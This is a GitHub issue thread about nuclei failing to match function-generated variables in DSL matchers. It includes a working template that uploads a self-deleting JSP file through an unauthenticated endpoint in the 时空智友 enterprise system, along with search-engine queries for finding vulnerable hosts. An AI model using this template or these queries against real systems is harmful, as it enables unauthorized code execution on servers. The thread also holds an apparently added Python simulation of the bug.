
Fixed strings can be matched but random strings cannot be matched

Open HuTa0kj opened this issue 1 year ago • 5 comments

Nuclei version: 3.1.2

Current Behavior:

When I was using a template to match a vulnerability, I found that when I used a fixed string, nuclei could match the vulnerability. If I used the string obtained from the random function, random_str: "{{rand_base(8)}}", it would not be matched. And in -debug, the content I need to match had been echoed.

zoomeye-query: app:"时空智友企业流程化管控系统"
http-general-query: iconhash: "2464cbce5dd2681dd4fb62d055520d78" || title:"时空智友"

My Template:

id: test
info:
  name: test
  author: Blame Team
  severity: high
  description: ''
  reference: []
  classification:
    cvss-metrics: ''
    cvss-score: 0.0
    cve-id: ''
    cwe-id: ''
  tags: ''

variables:
  random_str: "yeNidoSe"
  # random_str: "{{rand_base(8)}}"
  command: '<% out.println("{{random_str}}");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>'
  url_encoding_str: "{{url_encode(command)}}"

requests:
  - raw:
      - |
        POST /formservice?service=updater.uploadStudioFile HTTP/1.1
        Content-Type: application/x-www-form-urlencoded

        content=<?xml%20version="1.0"?><root><filename>{{randstr}}.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01%2008:00:00</lmtime></root><!--{{url_encoding_str}} -->

      - |
        GET /update/temp/studio/{{randstr}}.jsp HTTP/1.1

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 200"
          - "contains(body_2, '{{random_str}}')"
        condition: and

Expected Behavior:

Use random numbers and match successfully.

Steps To Reproduce:

1. Run nuclei -t ./tmp/test.yaml -u http://x.x.x.x -debug

Match results

HTTP/1.1 200 OK
Connection: close
Content-Length: 187
Content-Type: text/html
Date: Thu, 21 Dec 2023 07:59:25 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=74CF3027EEA655617A6A3D7FE95BFA8C; Path=/

<?xml version="1.0"?><root><filename>9ZqNHfXhTdefbkRPdoow7IDin0h.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01 08:00:00</lmtime></root><!--yeNidoSe
 -->
[test:dsl-1] [http] [high] http://x.x.x.x/update/temp/studio/9ZqNHfXhTdefbkRPdoow7IDin0h.jsp

2. Comment out random_str: "yeNidoSe" and use random_str: "{{rand_base(8)}}".

3. Run nuclei -t ./tmp/test.yaml -u http://x.x.x.x -debug

Match results

HTTP/1.1 200 OK
Connection: close
Content-Length: 187
Content-Type: text/html
Date: Thu, 21 Dec 2023 07:59:15 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C1C260C9D15F311763C63BF660EF275C; Path=/

<?xml version="1.0"?><root><filename>3ZqNG9gFF8dCluAs0QFVey0N0JA.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01 08:00:00</lmtime></root><!--n0UpLwQA
 -->
[INF] No results found. Better luck next time!

In debug, I saw the value n0UpLwQA that I needed to match, but unfortunately nuclei did not show that the match was successful.

Anything else:

  • Matching failed using versions 3.1.2 and 3.1.0, but matching was successful in version 2.8.9.
  • I'm not using any random functions other than rand_base.

Thank you all!

HuTa0kj avatar Dec 21 '23 08:12 HuTa0kj

maybe this is a dupe of #4405?

jimen0 avatar Dec 23 '23 21:12 jimen0

> maybe this is a dupe of #4405?

@jimen0 Thank you for your attention. After my testing, this is not the same problem; the random number I generated is the same as the random number I matched.

HuTa0kj avatar Dec 24 '23 05:12 HuTa0kj

Has it been solved?

anquanscan avatar Dec 29 '23 21:12 anquanscan

I've encountered this issue as well.

Current Behavior:

In version 3.1.3, the DSL matcher fails to correctly match custom variables used within functions, while the word matcher works fine.

In theory, both the DSL matcher and the word matcher should yield the same results for custom variables. However, in my usage, the results for my custom variable {{Time}} are significantly different between the two.

Here's my template (with some content omitted for readability):

variables:
  Time: '{{date_time("%Y-%M-%D")}}'

http:
  - raw:
      - |+
        POST /emap/webservice/gis/soap/poi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        ……

      - |
        GET /upload/{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}
    
    req-condition: true
    
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains_all(body_1, "soap", "Envelope", "Body", "xmlns", "code")'
        condition: and

#      - type: dsl
#        dsl:
#          - "contains(body_2, '{{Time}}')"
#        condition: and

      - type: word
        words:
          - "{{Time}}"
        part: body_2

kenyon-wong avatar Jan 02 '24 07:01 kenyon-wong
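As an added illustration (a constructed simulation, not nuclei's code and not a diagnosis of the bug): the symptom in the first post, where a fixed random_str matches but "{{rand_base(8)}}" does not, is exactly what a template author sees if the engine expands a function-valued variable afresh at match time instead of reusing the value it already sent in the request; kenyon-wong's report shows the same pattern of a variable holding a function. TemplateRun, simulate, the memoize switch and the seeded RNG are all assumptions of this example.

```python
import random
import re
import string

# Constructed simulation of nuclei-style {{...}} expansion. It is NOT nuclei's
# code and does not claim to be the root cause of the report; it only shows
# why a template author depends on "evaluate once, reuse at match time".
PLACEHOLDER = re.compile(r"\{\{(\w+)(?:\((\d*)\))?\}\}")


class TemplateRun:
    """One scan against one target, with an optional per-run variable cache."""

    def __init__(self, variables, memoize, seed=1):
        self.variables = variables      # name -> definition, e.g. "{{rand_base(8)}}"
        self.memoize = memoize          # True: a variable is evaluated once per run
        self.rng = random.Random(seed)  # seeded so the simulation is reproducible
        self.cache = {}

    def _call(self, func, arg):
        # Only the one helper the report uses is modelled (assumed semantics).
        if func == "rand_base":
            return "".join(self.rng.choices(string.ascii_letters, k=int(arg)))
        raise KeyError(func)

    def render(self, text):
        """Expand every {{...}} in text; a variable may itself hold a function."""
        def expand(m):
            name, arg = m.group(1), m.group(2)
            if arg is not None:                      # {{func(n)}}: call it now
                return self._call(name, arg)
            if self.memoize and name in self.cache:  # reuse the value already sent
                return self.cache[name]
            value = self.render(self.variables[name])
            if self.memoize:
                self.cache[name] = value
            return value
        return PLACEHOLDER.sub(expand, text)


def simulate(variables, memoize):
    """Expand the marker for request 1, let body_2 'echo' it, then run the DSL check."""
    run = TemplateRun(variables, memoize)
    command = run.render('<% out.println("{{random_str}}"); %>')  # request-time expansion
    body_2 = "<!--" + command.split('"')[1] + " -->"              # what the server echoed back
    expected = run.render("{{random_str}}")                      # contains(body_2, '{{random_str}}')
    return expected in body_2, expected, body_2
```

With memoize=True the marker sent and the marker checked are the same value and the match succeeds; with memoize=False the check expands a second, different random string and fails, while a fixed string matches either way.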

> Has it been solved?

No

HuTa0kj avatar Jan 02 '24 11:01 HuTa0kj